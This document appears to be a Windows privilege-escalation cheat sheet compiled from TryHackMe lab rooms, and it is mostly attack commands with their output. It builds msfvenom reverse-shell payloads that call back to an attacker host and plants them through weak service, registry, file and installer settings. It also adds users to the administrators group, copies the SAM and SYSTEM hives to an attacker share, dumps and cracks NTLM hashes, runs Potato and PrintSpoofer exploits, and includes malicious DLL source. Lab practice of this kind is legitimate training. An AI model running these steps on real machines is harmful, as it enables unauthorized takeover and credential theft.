Windows Privesc
Tools
Reverse shell
Using msfvenom :
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.52.128 LPORT=8888 -f exe -o revshell.exe
Using nishang.
Exploit suggester
Windows-Exploit-Suggester
$ git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester
$ cd Windows-Exploit-Suggester
$ python2 windows-exploit-suggester.py --update
$ # python2 -m pip install xlrd==1.1.0
$ python2 windows-exploit-suggester.py --database 2021-12-11-mssb.xls --ostext 'Windows 2012 R2 (6.3 Build 9600)'
or
$ python2 windows-exploit-suggester.py --database 2021-12-11-mssb.xls --systeminfo sysinfo_output.txt
WES-NG
$ python3 -m pip install wesng
$ wesng --update
PS> systeminfo > systeminfo.txt
$ wesng systeminfo.txt
Metasploit
Post exploitation module : multi/recon/local_exploit_suggester.
Services
Unquoted path
C:\Program.exeC:\Program Files\Unquoted.exeC:\Program Files\Unquoted Path Service\Common.exeC:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
C:\PrivEsc>sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: unquotedsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Unquoted Path Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Check if we can write into the folder
C:\PrivEsc>accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
C:\Program Files\Unquoted Path Service
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Users
RW NT SERVICE\TrustedInstaller
RW NT AUTHORITY\SYSTEM
RW BUILTIN\Administrators
# Copy reverse shell
C:\PrivEsc>copy C:\Users\user\revshell.exe "C:\Program Files\Unquoted Path Service\Common.exe"
1 file(s) copied.
C:\PrivEsc>net start unquotedsvc
...
Insecure service permissions
List permission using sc.
C:\> sc sdshow <service>
D:(A;;CCLCSWLORC;;;**AU**)(A;;CCLCSWRPDTLOCRRCWDWO;;;**BA**)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;**SY**)(A;;CCLCSWLORC;;;**BU**)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;**WD**)
More information about security descriptors.
List permissions of a user using accesschk.exe.
C:\> accesschk.exe /accepteula -wuvc <service>
C:\> accesschk.exe /accepteula -wuvc daclsvc
RW daclsvc
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_CHANGE_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_STOP
READ_CONTROL
SERVICE_CHANGE_CONFIG : Change the service configuration.
# Check the service 'daclsvc' configuration (qc : query configuration)
C:\PrivEsc>sc qc daclsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: daclsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\DACL Service\daclservice.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DACL Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Change the binpath value
C:\PrivEsc>sc config daclsvc binpath="\"C:\Users\user\revshell.exe\""
[SC] ChangeServiceConfig SUCCESS
C:\PrivEsc>sc qc daclsvc
[...]
BINARY_PATH_NAME : "C:\Users\user\revshell.exe"
[...]
# Start the service 'daclsvc'
C:\PrivEsc>net start daclsvc
Faster way :
C:\> sc config daclsvc binpath= "net localgroup administrators user /add"
C:\> sc start daclsvc
# Then
C:\> net localgroup administrators
Insecure registry permissions
Add registy keys :
C:\PrivEsc>sc qc regsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: regsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Insecure Registry Service\insecureregistryservice.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Insecure Registry Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# regsvc service is writable by the "NT AUTHORITY\INTERACTIVE" group (essentially all logged-on users)
C:\PrivEsc>accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
HKLM\System\CurrentControlSet\Services\regsvc
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
KEY_ALL_ACCESS
RW BUILTIN\Administrators
KEY_ALL_ACCESS
RW NT AUTHORITY\INTERACTIVE
KEY_ALL_ACCESS
# Add registry key to execute reverse shell
C:\PrivEsc>reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Users\User\revshell.exe /f
The operation completed successfully.
C:\PrivEsc>net start regsvc
...
Insecure file permissions
Service binary file is writable by everyone (BUILTIN\Users) :
C:\PrivEsc>sc qc filepermsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: filepermsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\File Permissions Service\filepermservice.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : File Permissions Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\PrivEsc>accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
C:\Program Files\File Permissions Service\filepermservice.exe
Medium Mandatory Level (Default) [No-Write-Up]
RW Everyone
FILE_ALL_ACCESS
RW NT AUTHORITY\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\Administrators
FILE_ALL_ACCESS
RW WIN-QBA94KB3IOF\Administrator
FILE_ALL_ACCESS
RW BUILTIN\Users
FILE_ALL_ACCESS
# Replace service binary file by a reverse shell
C:\PrivEsc>copy C:\Users\user\revshell.exe "C:\Program Files\File Permissions Service\filepermservice.exe"
Overwrite C:\Program Files\File Permissions Service\filepermservice.exe? (Yes/No/All): Yes
Yes
1 file(s) copied.
C:\PrivEsc>net start filepermsvc
...
Autoruns
List autoruns :
C:\Users\user>wmic startup get caption,command
Caption Command
SecurityHealth %windir%\system32\SecurityHealthSystray.exe
My Program "C:\Program Files\Autorun Program\program.exe"
If you can overwrite C:\Program Files\Autorun Program\program.exe, you can replace it by your reverse shell and wait for the administrator to log in.
AlwaysInstallElevated
You can use the AlwaysInstallElevated policy to install a Windows Installer package with elevated (system) privileges (docs : link).
To install a package with elevated (system) privileges, set the AlwaysInstallElevated value to "1" under both of the following registry keys:
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\InstallerHKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
C:\Users\user>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
C:\Users\user>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
Exploitation :
# Attacker host
$ msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=10.9.52.138 LPORT=9000 -f msi -o reverse_installer.msi
# Victim host
c:\Users\user>msiexec /qn /i "C:\Users\user\reverse_installer.msi"
Application running as admin
PS C:\Users\user> tasklist /V | findstr paint
mspaint.exe 4352 RDP-Tcp#0 2 61,256 K Running WIN-QBA94KB3IOF\admin 0:00:10 Untitled - Paint
Open file://c:/windows/system32/cmd.exe in MS Paint "open file dialog".
Saved credentials
PS C:\Users\user> cmdkey /list
Currently stored credentials:
Target: WindowsLive:target=virtualapp/didlogical
Type: Generic
User: 02nfpgrklkitqatu
Local machine persistence
Target: Domain:interactive=WIN-QBA94KB3IOF\admin
Type: Domain Password
User: WIN-QBA94KB3IOF\admin
PS C:\Users\user> runas /savecred /user:admin cmd.exe
Attempting to start cmd.exe as user "WIN-QBA94KB3IOF\admin" ...
Security Account Manager (SAM)
PS C:\Users\user> copy C:\Windows\Repair\SAM \\10.9.52.138\\tmpshare
PS C:\Users\user> copy C:\Windows\Repair\SYSTEM \\10.9.52.138\\tmpshare
Then :
$ git clone https://github.com/Tib3rius/creddump7
Cloning into 'creddump7'...
[...]
$ python3 creddump7/pwdump.py SYSTEM SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6ebaa6d5e6e601996eefe4b6048834c2:::
user:1000:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
$ hashcat -m 1000 <hash> /usr/share/wordlists/rockyou.txt
[...]
Scheduled Tasks
Writable scripts
Startup apps
Folder "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp".
If Writable, you can add your reverse shell EXE file. Then, wait for a higher privilege user to log on.
Privileges
- SeImpersonatePrivilege
- SeAssignPrimaryPrivilege
- SeTcbPrivilege
- SeBackupPrivilege
- SeRestorePrivilege
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeTakeOwnershipPrivilege
- SeDebugPrivilege
Docs : - Access Tokens
Two types of access tokens:
- Primary access tokens : those associated with a user account that are generated on log on.
- Impersonation tokens : Allow a particular process (or thread in a process) to gain access to resources using the token of another (user/client) process.
Potato exploit (Rogue potato, Juicy potato, ...)
Rogue Potato :
- >= Windows 10 1809
- >= Windows Server 2019
Juicy Potato :
- < Windows 10 1809
- < Windows Server 2019
Privileges : SeAssignPrimaryToken or SeImpersonateprivilege
Command to check privileges : whoami /priv
Exploitation :
Redirect attacker:135 to victim:9999 :
sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.13.238:9999
Exploit Rogue potato :
.\RoguePotato.exe -r <attacker_ip> -e "C:\path\reverse.exe" -l 9999
PrintSpoofer
Privileges : SeAssignPrimaryToken or SeImpersonateprivilege
.\PrintSpoofer.exe -c "C:\Windows\System32\cmd.exe" -i
Tater (powershell implementation)
- Tater on Github.
C:\> powershell.exe -nop -ep bypass
PS C:\> Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
PS C:\> Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
# Check
PS C:\> net localgroup administrators
DLL Hijacking
- https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
DLL hijacking requires an application (typically an exe file) that either has a missing DLL file, or where the search order can be used to insert the malicious DLL file.
In summary, for standard desktop applications, Windows will follow one of the orders listed below depending on if the SafeDllSearchMode is enabled or not.
If SafeDllSearchMode is enabled, the search order is as follows:
- The directory from which the application loaded.
- The system directory. Use the GetSystemDirectory function to get the path of this directory.
- The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.
- The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.
- The current directory.
- The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.
If SafeDllSearchMode is disabled, the search order is as follows:
- The directory from which the application loaded.
- The current directory.
- The system directory. Use the GetSystemDirectory function to get the path of this directory.
- The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.
- The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.
- The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.
Malicious DDL :
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
ExitProcess(0);
}
return TRUE;
}
Compilation using mingw compiler (apt install gcc-mingw-w64-x86-64) :
$ x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
References
- https://tryhackme.com/room/windows10privesc
- https://tryhackme.com/room/winprivesc